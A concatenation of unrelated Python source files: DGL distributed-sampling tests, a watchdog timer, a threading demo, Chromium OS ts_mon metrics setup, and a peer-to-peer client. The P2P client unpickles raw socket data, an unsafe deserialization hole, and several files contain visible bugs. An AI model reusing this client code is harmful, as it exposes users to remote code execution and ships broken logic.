block.edata[dgl.EID] = sampled_graph.edata[dgl.EID]
except Exception as e:
print(e)
block = None
dgl.distributed.exit_client()
return block, gpb
def check_rpc_hetero_sampling_shuffle(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = create_random_hetero()
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
block, gpb = start_hetero_sample_client(0, tmpdir, num_server > 1,
nodes = {'n3': [0, 10, 99, 66, 124, 208]})
print("Done sampling")
for p in pserver_list:
p.join()
orig_nid_map = {ntype: F.zeros((g.number_of_nodes(ntype),), dtype=F.int64) for ntype in g.ntypes}
orig_eid_map = {etype: F.zeros((g.number_of_edges(etype),), dtype=F.int64) for etype in g.etypes}
for i in range(num_server):
part, _, _, _, _, _, _ = load_partition(tmpdir / 'test_sampling.json', i)
ntype_ids, type_nids = gpb.map_to_per_ntype(part.ndata[dgl.NID])
for ntype_id, ntype in enumerate(g.ntypes):
idx = ntype_ids == ntype_id
F.scatter_row_inplace(orig_nid_map[ntype], F.boolean_mask(type_nids, idx),
F.boolean_mask(part.ndata['orig_id'], idx))
etype_ids, type_eids = gpb.map_to_per_etype(part.edata[dgl.EID])
for etype_id, etype in enumerate(g.etypes):
idx = etype_ids == etype_id
F.scatter_row_inplace(orig_eid_map[etype], F.boolean_mask(type_eids, idx),
F.boolean_mask(part.edata['orig_id'], idx))
for src_type, etype, dst_type in block.canonical_etypes:
src, dst = block.edges(etype=etype)
# These are global Ids after shuffling.
shuffled_src = F.gather_row(block.srcnodes[src_type].data[dgl.NID], src)
shuffled_dst = F.gather_row(block.dstnodes[dst_type].data[dgl.NID], dst)
shuffled_eid = block.edges[etype].data[dgl.EID]
orig_src = F.asnumpy(F.gather_row(orig_nid_map[src_type], shuffled_src))
orig_dst = F.asnumpy(F.gather_row(orig_nid_map[dst_type], shuffled_dst))
orig_eid = F.asnumpy(F.gather_row(orig_eid_map[etype], shuffled_eid))
# Check the node Ids and edge Ids.
orig_src1, orig_dst1 = g.find_edges(orig_eid, etype=etype)
assert np.all(F.asnumpy(orig_src1) == orig_src)
assert np.all(F.asnumpy(orig_dst1) == orig_dst)
def get_degrees(g, nids, ntype):
deg = F.zeros((len(nids),), dtype=F.int64)
for srctype, etype, dsttype in g.canonical_etypes:
if srctype == ntype:
deg += g.out_degrees(u=nids, etype=etype)
elif dsttype == ntype:
deg += g.in_degrees(v=nids, etype=etype)
return deg
def check_rpc_hetero_sampling_empty_shuffle(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = create_random_hetero(empty=True)
num_parts = num_server
num_hops = 1
orig_nids, _ = partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis',
reshuffle=True, return_mapping=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
deg = get_degrees(g, orig_nids['n3'], 'n3')
empty_nids = F.nonzero_1d(deg == 0)
block, gpb = start_hetero_sample_client(0, tmpdir, num_server > 1,
nodes = {'n3': empty_nids})
print("Done sampling")
for p in pserver_list:
p.join()
assert block.number_of_edges() == 0
assert len(block.etypes) == len(g.etypes)
def check_rpc_hetero_etype_sampling_shuffle(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = create_random_hetero(dense=True)
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
fanout = 3
block, gpb = start_hetero_etype_sample_client(0, tmpdir, num_server > 1, fanout,
nodes={'n3': [0, 10, 99, 66, 124, 208]})
print("Done sampling")
for p in pserver_list:
p.join()
src, dst = block.edges(etype=('n1', 'r2', 'n3'))
assert len(src) == 18
src, dst = block.edges(etype=('n2', 'r3', 'n3'))
assert len(src) == 18
orig_nid_map = {ntype: F.zeros((g.number_of_nodes(ntype),), dtype=F.int64) for ntype in g.ntypes}
orig_eid_map = {etype: F.zeros((g.number_of_edges(etype),), dtype=F.int64) for etype in g.etypes}
for i in range(num_server):
part, _, _, _, _, _, _ = load_partition(tmpdir / 'test_sampling.json', i)
ntype_ids, type_nids = gpb.map_to_per_ntype(part.ndata[dgl.NID])
for ntype_id, ntype in enumerate(g.ntypes):
idx = ntype_ids == ntype_id
F.scatter_row_inplace(orig_nid_map[ntype], F.boolean_mask(type_nids, idx),
F.boolean_mask(part.ndata['orig_id'], idx))
etype_ids, type_eids = gpb.map_to_per_etype(part.edata[dgl.EID])
for etype_id, etype in enumerate(g.etypes):
idx = etype_ids == etype_id
F.scatter_row_inplace(orig_eid_map[etype], F.boolean_mask(type_eids, idx),
F.boolean_mask(part.edata['orig_id'], idx))
for src_type, etype, dst_type in block.canonical_etypes:
src, dst = block.edges(etype=etype)
# These are global Ids after shuffling.
shuffled_src = F.gather_row(block.srcnodes[src_type].data[dgl.NID], src)
shuffled_dst = F.gather_row(block.dstnodes[dst_type].data[dgl.NID], dst)
shuffled_eid = block.edges[etype].data[dgl.EID]
orig_src = F.asnumpy(F.gather_row(orig_nid_map[src_type], shuffled_src))
orig_dst = F.asnumpy(F.gather_row(orig_nid_map[dst_type], shuffled_dst))
orig_eid = F.asnumpy(F.gather_row(orig_eid_map[etype], shuffled_eid))
# Check the node Ids and edge Ids.
orig_src1, orig_dst1 = g.find_edges(orig_eid, etype=etype)
assert np.all(F.asnumpy(orig_src1) == orig_src)
assert np.all(F.asnumpy(orig_dst1) == orig_dst)
def check_rpc_hetero_etype_sampling_empty_shuffle(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = create_random_hetero(dense=True, empty=True)
num_parts = num_server
num_hops = 1
orig_nids, _ = partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis',
reshuffle=True, return_mapping=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
fanout = 3
deg = get_degrees(g, orig_nids['n3'], 'n3')
empty_nids = F.nonzero_1d(deg == 0)
block, gpb = start_hetero_etype_sample_client(0, tmpdir, num_server > 1, fanout,
nodes={'n3': empty_nids})
print("Done sampling")
for p in pserver_list:
p.join()
assert block.number_of_edges() == 0
assert len(block.etypes) == len(g.etypes)
# Wait non shared memory graph store
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="Turn off Mxnet support")
@pytest.mark.parametrize("num_server", [1, 2])
def test_rpc_sampling_shuffle(num_server):
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_sampling_shuffle(Path(tmpdirname), num_server)
check_rpc_hetero_sampling_shuffle(Path(tmpdirname), num_server)
check_rpc_hetero_sampling_empty_shuffle(Path(tmpdirname), num_server)
check_rpc_hetero_etype_sampling_shuffle(Path(tmpdirname), num_server)
check_rpc_hetero_etype_sampling_empty_shuffle(Path(tmpdirname), num_server)
def check_standalone_sampling(tmpdir, reshuffle):
g = CitationGraphDataset("cora")[0]
num_parts = 1
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=reshuffle)
os.environ['DGL_DIST_MODE'] = 'standalone'
dgl.distributed.initialize("rpc_ip_config.txt")
dist_graph = DistGraph("test_sampling", part_config=tmpdir / 'test_sampling.json')
sampled_graph = sample_neighbors(dist_graph, [0, 10, 99, 66, 1024, 2008], 3)
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
dgl.distributed.exit_client()
def check_standalone_etype_sampling(tmpdir, reshuffle):
hg = CitationGraphDataset('cora')[0]
num_parts = 1
num_hops = 1
partition_graph(hg, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=reshuffle)
os.environ['DGL_DIST_MODE'] = 'standalone'
dgl.distributed.initialize("rpc_ip_config.txt")
dist_graph = DistGraph("test_sampling", part_config=tmpdir / 'test_sampling.json')
sampled_graph = sample_etype_neighbors(dist_graph, [0, 10, 99, 66, 1023], dgl.ETYPE, 3)
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == hg.number_of_nodes()
assert np.all(F.asnumpy(hg.has_edges_between(src, dst)))
eids = hg.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
dgl.distributed.exit_client()
def check_standalone_etype_sampling_heterograph(tmpdir, reshuffle):
hg = CitationGraphDataset('cora')[0]
num_parts = 1
num_hops = 1
src, dst = hg.edges()
new_hg = dgl.heterograph({('paper', 'cite', 'paper'): (src, dst),
('paper', 'cite-by', 'paper'): (dst, src)},
{'paper': hg.number_of_nodes()})
partition_graph(new_hg, 'test_hetero_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=reshuffle)
os.environ['DGL_DIST_MODE'] = 'standalone'
dgl.distributed.initialize("rpc_ip_config.txt")
dist_graph = DistGraph("test_hetero_sampling", part_config=tmpdir / 'test_hetero_sampling.json')
sampled_graph = sample_etype_neighbors(dist_graph, [0, 1, 2, 10, 99, 66, 1023, 1024, 2700, 2701], dgl.ETYPE, 1)
src, dst = sampled_graph.edges(etype=('paper', 'cite', 'paper'))
assert len(src) == 10
src, dst = sampled_graph.edges(etype=('paper', 'cite-by', 'paper'))
assert len(src) == 10
assert sampled_graph.number_of_nodes() == new_hg.number_of_nodes()
dgl.distributed.exit_client()
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_standalone_sampling():
import tempfile
os.environ['DGL_DIST_MODE'] = 'standalone'
with tempfile.TemporaryDirectory() as tmpdirname:
check_standalone_sampling(Path(tmpdirname), False)
check_standalone_sampling(Path(tmpdirname), True)
def start_in_subgraph_client(rank, tmpdir, disable_shared_mem, nodes):
gpb = None
dgl.distributed.initialize("rpc_ip_config.txt")
if disable_shared_mem:
_, _, _, gpb, _, _, _ = load_partition(tmpdir / 'test_in_subgraph.json', rank)
dist_graph = DistGraph("test_in_subgraph", gpb=gpb)
try:
sampled_graph = dgl.distributed.in_subgraph(dist_graph, nodes)
except Exception as e:
print(e)
sampled_graph = None
dgl.distributed.exit_client()
return sampled_graph
def check_rpc_in_subgraph_shuffle(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
partition_graph(g, 'test_in_subgraph', num_parts, tmpdir,
num_hops=1, part_method='metis', reshuffle=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_in_subgraph'))
p.start()
time.sleep(1)
pserver_list.append(p)
nodes = [0, 10, 99, 66, 1024, 2008]
time.sleep(3)
sampled_graph = start_in_subgraph_client(0, tmpdir, num_server > 1, nodes)
for p in pserver_list:
p.join()
orig_nid = F.zeros((g.number_of_nodes(),), dtype=F.int64, ctx=F.cpu())
orig_eid = F.zeros((g.number_of_edges(),), dtype=F.int64, ctx=F.cpu())
for i in range(num_server):
part, _, _, _, _, _, _ = load_partition(tmpdir / 'test_in_subgraph.json', i)
orig_nid[part.ndata[dgl.NID]] = part.ndata['orig_id']
orig_eid[part.edata[dgl.EID]] = part.edata['orig_id']
src, dst = sampled_graph.edges()
src = orig_nid[src]
dst = orig_nid[dst]
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
subg1 = dgl.in_subgraph(g, orig_nid[nodes])
src1, dst1 = subg1.edges()
assert np.all(np.sort(F.asnumpy(src)) == np.sort(F.asnumpy(src1)))
assert np.all(np.sort(F.asnumpy(dst)) == np.sort(F.asnumpy(dst1)))
eids = g.edge_ids(src, dst)
eids1 = orig_eid[sampled_graph.edata[dgl.EID]]
assert np.array_equal(F.asnumpy(eids1), F.asnumpy(eids))
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_rpc_in_subgraph():
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_in_subgraph_shuffle(Path(tmpdirname), 2)
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="Turn off Mxnet support")
def test_standalone_etype_sampling():
import tempfile
with tempfile.TemporaryDirectory() as tmpdirname:
os.environ['DGL_DIST_MODE'] = 'standalone'
check_standalone_etype_sampling_heterograph(Path(tmpdirname), True)
with tempfile.TemporaryDirectory() as tmpdirname:
os.environ['DGL_DIST_MODE'] = 'standalone'
check_standalone_etype_sampling(Path(tmpdirname), True)
check_standalone_etype_sampling(Path(tmpdirname), False)
if __name__ == "__main__":
import tempfile
with tempfile.TemporaryDirectory() as tmpdirname:
os.environ['DGL_DIST_MODE'] = 'standalone'
check_standalone_etype_sampling_heterograph(Path(tmpdirname), True)
with tempfile.TemporaryDirectory() as tmpdirname:
os.environ['DGL_DIST_MODE'] = 'standalone'
check_standalone_etype_sampling(Path(tmpdirname), True)
check_standalone_etype_sampling(Path(tmpdirname), False)
check_standalone_sampling(Path(tmpdirname), True)
check_standalone_sampling(Path(tmpdirname), False)
os.environ['DGL_DIST_MODE'] = 'distributed'
check_rpc_sampling(Path(tmpdirname), 2)
check_rpc_sampling(Path(tmpdirname), 1)
check_rpc_get_degree_shuffle(Path(tmpdirname), 1)
check_rpc_get_degree_shuffle(Path(tmpdirname), 2)
check_rpc_find_edges_shuffle(Path(tmpdirname), 2)
check_rpc_find_edges_shuffle(Path(tmpdirname), 1)
check_rpc_hetero_find_edges_shuffle(Path(tmpdirname), 1)
check_rpc_hetero_find_edges_shuffle(Path(tmpdirname), 2)
check_rpc_in_subgraph_shuffle(Path(tmpdirname), 2)
check_rpc_sampling_shuffle(Path(tmpdirname), 1)
check_rpc_sampling_shuffle(Path(tmpdirname), 2)
check_rpc_hetero_sampling_shuffle(Path(tmpdirname), 1)
check_rpc_hetero_sampling_shuffle(Path(tmpdirname), 2)
check_rpc_hetero_sampling_empty_shuffle(Path(tmpdirname), 1)
check_rpc_hetero_etype_sampling_shuffle(Path(tmpdirname), 1)
check_rpc_hetero_etype_sampling_shuffle(Path(tmpdirname), 2)
check_rpc_hetero_etype_sampling_empty_shuffle(Path(tmpdirname), 1)
|
watchdog_timer.py
|
from threading import Thread, Event
from datetime import datetime, timezone
from time import sleep
import logging
logger = logging.getLogger()
class WDT:
def __init__(self, logger, callback, check_interval_sec: float = 0.01, trigger_delta_sec: float = 1, identifier=None):
self.check_interval_sec = check_interval_sec
self.trigger_delta = trigger_delta_sec * 1000000
self.callback = callback
self.identifier = identifier
self.logger = logger
self.pause_flag = False
self.resume_event = Event()
self.thread_stopped = Event()
self.poison_pill = False
self.internal_ts = self.now()
self.checker_thread_name = 'wdt_checker'
self.start()
self.logger.info("INFO",'WDT: Started')
def __del__(self):
self.stop()
self.logger.info("INFO", 'WDT: Destroyed through destructor')
@staticmethod
def now():
return int(datetime.now(tz=timezone.utc).timestamp() * 1000000)
def checker(self):
while True:
self.logger.info("DEBUG", 'WDT: Running checker')
if self.poison_pill:
break
if self.pause_flag:
self.logger.info("DEBUG", 'WDT: The {} thread is now paused')
self.resume_event.wait()
self.resume_event.clear()
self.logger.info("DEBUG",'WDT: The {} thread has now resumed')
elif (self.now() - self.internal_ts) > self.trigger_delta:
if self.identifier is None:
self.pause()
logger.info("*** BLOQUEADO, calling to recover ****")
self.callback()
self.resume()
else:
self.callback(self, self.identifier)
#logger.debug('WDT: Sleeping for {} sec.'.format(self.check_interval_sec))
sleep(self.check_interval_sec)
#logger.debug('WDT: The checker thread has exited the loop')
self.thread_stopped.set()
def update(self):
self.internal_ts = self.now()
#logger.debug('WDT: Internal timer was set to: {}'.format(self.internal_ts))
def reset(self):
self.update()
def pause(self):
self.pause_flag = True
#logger.debug('WDT: Pause command was invoked')
def resume(self):
self.pause_flag = False
#logger.debug('WDT: Resume command was invoked')
self.resume_event.set()
def start(self):
self.update()
try:
t = Thread(name=self.checker_thread_name, target=self.checker)
t.start()
except Exception as exp:
self.logger.info("ERROR",'WDT: Unable to launch the {} thread'.format(self.checker_thread_name))
self.logger.info("ERROR",'Exception: {}'.format(exp))
def stop(self):
self.poison_pill = True
#logger.debug('WDT: Poison pill was injected, to stop the {} thread'.format(self.checker_thread_name))
self.thread_stopped.wait()
self.logger.info("ERROR",'WDT: Stopped')
def get_internal_time(self):
return self.internal_ts
|
threads.py
|
#thread
import threading
import time
#taking advantage og threading.currentThread().getName() function to debug the state of your threads
def worker():
print(threading.currentThread().getName(),"Starting")
time.sleep(2)
print(threading.currentThread().getName(),"Exiting")
w = threading.Thread(name="worker",target=worker) #given a name to the thread
w2 = threading.Thread(target=worker) #use default name
w.start()
w2.start()
#debug messages can be printed to log messages as well in logging module
input()
|
ts_mon_config.py
|
# -*- coding: utf-8 -*-
# Copyright 2014 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Wrapper for inframon's command-line flag based configuration."""
from __future__ import print_function
import argparse
import contextlib
import multiprocessing
import os
import socket
import signal
import time
import Queue
from chromite.lib import cros_logging as logging
from chromite.lib import metrics
from chromite.lib import parallel
try:
from infra_libs.ts_mon import config
import googleapiclient.discovery
except (ImportError, RuntimeError) as e:
config = None
logging.warning('Failed to import ts_mon, monitoring is disabled: %s', e)
_WasSetup = False
FLUSH_INTERVAL = 60
@contextlib.contextmanager
def TrivialContextManager():
"""Context manager with no side effects."""
yield
def SetupTsMonGlobalState(service_name,
indirect=False,
suppress_exception=True,
short_lived=False,
auto_flush=True,
debug_file=None,
task_num=0):
"""Uses a dummy argument parser to get the default behavior from ts-mon.
Args:
service_name: The name of the task we are sending metrics from.
indirect: Whether to create a metrics.METRICS_QUEUE object and a separate
process for indirect metrics flushing. Useful for forking,
because forking would normally create a duplicate ts_mon thread.
suppress_exception: True to silence any exception during the setup. Default
is set to True.
short_lived: Whether this process is short-lived and should use the autogen
hostname prefix.
auto_flush: Whether to create a thread to automatically flush metrics every
minute.
debug_file: If non-none, send metrics to this path instead of to PubSub.
task_num: (Default 0) The task_num target field of the metrics to emit.
"""
if not config:
return TrivialContextManager()
# The flushing subprocess calls .flush manually.
if indirect:
auto_flush = False
# google-api-client has too much noisey logging.
options = _GenerateTsMonArgparseOptions(
service_name, short_lived, auto_flush, debug_file, task_num)
if indirect:
return _CreateTsMonFlushingProcess(options)
else:
_SetupTsMonFromOptions(options, suppress_exception)
return TrivialContextManager()
def _SetupTsMonFromOptions(options, suppress_exception):
"""Sets up ts-mon global state given parsed argparse options.
Args:
options: An argparse options object containing ts-mon flags.
suppress_exception: True to silence any exception during the setup. Default
is set to True.
"""
googleapiclient.discovery.logger.setLevel(logging.WARNING)
try:
config.process_argparse_options(options)
logging.notice('ts_mon was set up.')
global _WasSetup # pylint: disable=global-statement
_WasSetup = True
except Exception as e:
logging.warning('Failed to configure ts_mon, monitoring is disabled: %s', e,
exc_info=True)
if not suppress_exception:
raise
def _GenerateTsMonArgparseOptions(service_name, short_lived,
auto_flush, debug_file, task_num):
"""Generates an arg list for ts-mon to consume.
Args:
service_name: The name of the task we are sending metrics from.
short_lived: Whether this process is short-lived and should use the autogen
hostname prefix.
auto_flush: Whether to create a thread to automatically flush metrics every
minute.
debug_file: If non-none, send metrics to this path instead of to PubSub.
task_num: Override the default task num of 0.
"""
parser = argparse.ArgumentParser()
config.add_argparse_options(parser)
args = [
'--ts-mon-target-type', 'task',
'--ts-mon-task-service-name', service_name,
'--ts-mon-task-job-name', service_name,
]
if debug_file:
args.extend(['--ts-mon-endpoint', 'file://' + debug_file])
# Short lived processes will have autogen: prepended to their hostname and
# use task-number=PID to trigger shorter retention policies under
# chrome-infra@, and used by a Monarch precomputation to group across the
# task number.
# Furthermore, we assume they manually call ts_mon.Flush(), because the
# ts_mon thread will drop messages if the process exits before it flushes.
if short_lived:
auto_flush = False
fqdn = socket.getfqdn().lower()
host = fqdn.split('.')[0]
args.extend(['--ts-mon-task-hostname', 'autogen:' + host,
'--ts-mon-task-number', str(os.getpid())])
elif task_num:
args.extend(['--ts-mon-task-number', str(task_num)])
args.extend(['--ts-mon-flush', 'auto' if auto_flush else 'manual'])
return parser.parse_args(args=args)
@contextlib.contextmanager
def _CreateTsMonFlushingProcess(options):
"""Creates a separate process to flush ts_mon metrics.
Useful for multiprocessing scenarios where we don't want multiple ts-mon
threads send contradictory metrics. Instead, functions in
chromite.lib.metrics will send their calls to a Queue, which is consumed by a
dedicated flushing process.
Args:
options: An argparse options object to configure ts-mon with.
Side effects:
Sets chromite.lib.metrics.MESSAGE_QUEUE, which causes the metric functions
to send their calls to the Queue instead of creating the metrics.
"""
# If this is nested, we don't need to create another queue and another
# message consumer. Do nothing to continue to use the existing queue.
if metrics.MESSAGE_QUEUE or metrics.FLUSHING_PROCESS:
return
with parallel.Manager() as manager:
message_q = manager.Queue()
metrics.FLUSHING_PROCESS = multiprocessing.Process(
target=lambda: _SetupAndConsumeMessages(message_q, options))
metrics.FLUSHING_PROCESS.start()
# this makes the chromite.lib.metric functions use the queue.
# note - we have to do this *after* forking the ConsumeMessages process.
metrics.MESSAGE_QUEUE = message_q
try:
yield message_q
finally:
_CleanupMetricsFlushingProcess()
def _CleanupMetricsFlushingProcess():
"""Sends sentinal value to flushing process and .joins it."""
# Now that there is no longer a process to listen to the Queue, re-set it
# to None so that any future metrics are created within this process.
message_q = metrics.MESSAGE_QUEUE
flushing_process = metrics.FLUSHING_PROCESS
metrics.MESSAGE_QUEUE = None
metrics.FLUSHING_PROCESS = None
# If the process has already died, we don't need to try to clean it up.
if not flushing_process.is_alive():
return
# Send the sentinal value for "flush one more time and exit".
try:
message_q.put(None)
# If the flushing process quits, the message Queue can become full.
except IOError:
if not flushing_process.is_alive():
return
logging.info("Waiting for ts_mon flushing process to finish...")
flushing_process.join(timeout=FLUSH_INTERVAL*2)
if flushing_process.is_alive():
flushing_process.terminate()
if flushing_process.exitcode:
logging.warning("ts_mon_config flushing process did not exit cleanly.")
logging.info("Finished waiting for ts_mon process.")
def _SetupAndConsumeMessages(message_q, options):
"""Sets up ts-mon, and starts a MetricConsumer loop.
Args:
message_q: The metric multiprocessing.Queue to read from.
options: An argparse options object to configure ts-mon with.
"""
# Configure ts-mon, but don't start up a sending thread.
_SetupTsMonFromOptions(options, suppress_exception=True)
if not _WasSetup:
return
return MetricConsumer(message_q).Consume()
class MetricConsumer(object):
"""Configures ts_mon and gets metrics from a message queue.
This class is meant to be used in a subprocess. It configures itself
to receive a SIGHUP signal when the parent process dies, and catches the
signal in order to have a chance to flush any pending metrics one more time
before quitting.
"""
def __init__(self, message_q):
# If our parent dies, finish flushing before exiting.
self.reset_after_flush = []
self.last_flush = 0
self.pending = False
self.message_q = message_q
if parallel.ExitWithParent(signal.SIGHUP):
signal.signal(signal.SIGHUP, lambda _sig, _stack: self._WaitToFlush())
def Consume(self):
"""Emits metrics from self.message_q, flushing periodically.
The loop is terminated by a None entry on the Queue, which is a friendly
signal from the parent process that it's time to shut down. Before
returning, we wait to flush one more time to make sure that all the
metrics were sent.
"""
message = self.message_q.get()
while message:
self._CallMetric(message)
message = self._WaitForNextMessage()
if self.pending:
self._WaitToFlush()
def _CallMetric(self, message):
"""Calls the metric method from |message|, ignoring exceptions."""
try:
cls = getattr(metrics, message.metric_name)
metric = cls(*message.metric_args, **message.metric_kwargs)
if message.reset_after:
self.reset_after_flush.append(metric)
getattr(metric, message.method)(
*message.method_args,
**message.method_kwargs)
self.pending = True
except Exception:
logging.exception('Caught an exception while running %s',
_MethodCallRepr(message))
def _WaitForNextMessage(self):
"""Waits for a new message, flushing every |FLUSH_INTERVAL| seconds."""
while True:
time_delta = self._FlushIfReady()
try:
timeout = FLUSH_INTERVAL - time_delta
message = self.message_q.get(timeout=timeout)
return message
except Queue.Empty:
pass
def _WaitToFlush(self):
"""Sleeps until the next time we can call metrics.Flush(), then flushes."""
time_delta = time.time() - self.last_flush
time.sleep(max(0, FLUSH_INTERVAL - time_delta))
metrics.Flush(reset_after=self.reset_after_flush)
def _FlushIfReady(self):
"""Call metrics.Flush() if we are ready and have pending metrics.
This allows us to only call flush every FLUSH_INTERVAL seconds.
"""
now = time.time()
time_delta = now - self.last_flush
if time_delta > FLUSH_INTERVAL:
self.last_flush = now
time_delta = 0
metrics.Flush(reset_after=self.reset_after_flush)
self.pending = False
return time_delta
def _MethodCallRepr(message):
"""Gives a string representation of |obj|.|method|(*|args|, **|kwargs|)
Args:
message: A MetricCall object.
"""
if not message:
return repr(message)
obj = message.metric_name,
method = message.method,
args = message.method_args,
kwargs = message.method_kwargs
args_strings = (map(repr, args) +
[(str(k) + '=' + repr(v))
for k, v in kwargs.iteritems()])
return '%s.%s(%s)' % (repr(obj), method, ', '.join(args_strings))
|
client.py
|
"""
This file takes care of the client side of the peer to peer network
This file takes care of the file being downloaded on to the machine
"""
from server_client.constants import *
import pickle
class Client:
def __init__(self, addr, hashlist):
try:
# set up the socket
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# this allows python to use the recently closed socket
self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# set up socket connection
self.s.connect((addr, PORT))
# establish DHT variables
self.hashlist = hashlist
self.hashes = {} # these will be the file hashes paired with IP addresses
# update and output all the hashes for the files in the shared folder
j_thread = threading.Thread(target=self.update_hashes())
j_thread.daemon = True
j_thread.start()
# create to work on a different thread
i_thread = threading.Thread(target=self.send_message)
i_thread.daemon = True
i_thread.start()
# send the message requesting data so that it is constantly listening
while True:
r_thread = threading.Thread(target=self.recieve_message)
r_thread.start()
r_thread.join()
data = self.recieve_message()
if not data:
# means the server has failed
print("-" * 21 + " Server failed " + "-" * 21)
break
elif data[0:1] == b'\x11':
print("Got peers")
# first byte is the byte '\x11 we added to make sure that we have peers
self.update_peers(data[1:])
except Exception as e:
sys.exit()
"""
This thread will deal with printing the recieved message
"""
def recieve_message(self):
try:
while True:
print("Recieving -------")
data = self.s.recv(BYTE_SIZE)
if not data:
break
print("\nRecieved message on the client side is:")
d = pickle.loads(data)
print(d)
excluded_files = self.compare_hashes(d)
#for file in hashes:
# file_exists = False
"""
if self.previous_data != data:
fileIO.create_file(data)
self.previous_data = data
# TODO download the file to the computer
"""
return data
except KeyboardInterrupt:
self.send_disconnect_signal()
def compare_hashes(self,data):
print(data)
exc_list = []
for i in data:
print(i)
if self.hashes.has_key(i):
print(HOST,"has",i)
else:
exc_list.append(i)
print(HOST,"does not have",i)
return exc_list
"""
This method will append the list of file hashes to the hash table
and output the final hash table of values
"""
def update_hashes(self):
for i in self.hashlist:
self.hashes[i].append(HOST)
print("Have appended",i,"to",HOST)
print("The hash table of files is the following:")
hash_items = self.hashes.items()
for item in hash_items:
print(item)
"""
This method updates the list of peers
"""
def update_peers(self, peers):
# our peers list would lool like 127.0.0.1, 192.168.1.1,
# we do -1 to remove the last value which would be None
p2p.peers = str(peers, "utf-8").split(',')[:-1]
"""
This method is used to send the message
:param: msg -> The optional message to send
"""
def send_message(self):
try:
#while True:
# encode the message into bytes
# other code will run when this happens as the thread is busy
# request to download the file
self.s.send(REQUEST_STRING.encode('utf-8'))
except KeyboardInterrupt as e:
# If a user turns the server off due to KeyboardInterrupt
self.send_disconnect_signal()
return
def send_disconnect_signal(self):
print("Disconnected from server")
# signal the server that the connection has closed
self.s.send("q".encode('utf-8'))
sys.exit()
|
command_agent.py
|
# Copyright (c) 2021-2022, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
